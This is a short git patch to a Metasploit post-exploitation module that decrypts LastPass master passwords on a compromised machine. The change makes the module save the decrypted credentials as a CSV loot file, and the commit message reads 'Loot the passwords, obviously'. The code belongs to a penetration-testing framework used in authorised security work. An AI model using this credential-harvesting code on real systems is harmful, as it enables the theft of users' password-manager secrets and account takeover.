From 88c1647c80dbf114c85e3dea6f6c3ef287bb903d Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Sun, 19 Oct 2014 13:11:10 -0700
Subject: [PATCH] Loot the passwords, obviously

---
 modules/post/multi/gather/lastpass_creds.rb | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb
index 82094c1cd5..539f502262 100644
--- a/modules/post/multi/gather/lastpass_creds.rb
+++ b/modules/post/multi/gather/lastpass_creds.rb
@@ -104,7 +104,17 @@ class Metasploit3 < Msf::Post
       password = clear_text_password(user, enc_pass)
       credentials_table << [account, browser, user, password]
     end
-    print_good credentials_table.to_s unless credentials.empty?
+    unless credentials.empty?
+      print_good credentials_table.to_s
+      path = store_loot(
+        "lastpass.creds",
+        "text/csv",
+        session,
+        credentials_table.to_csv,
+        nil,
+        "Decrypted LastPass Master Passwords"
+      )
+    end
   end
 
   # Returns a mapping of { Account => { Browser => paths } }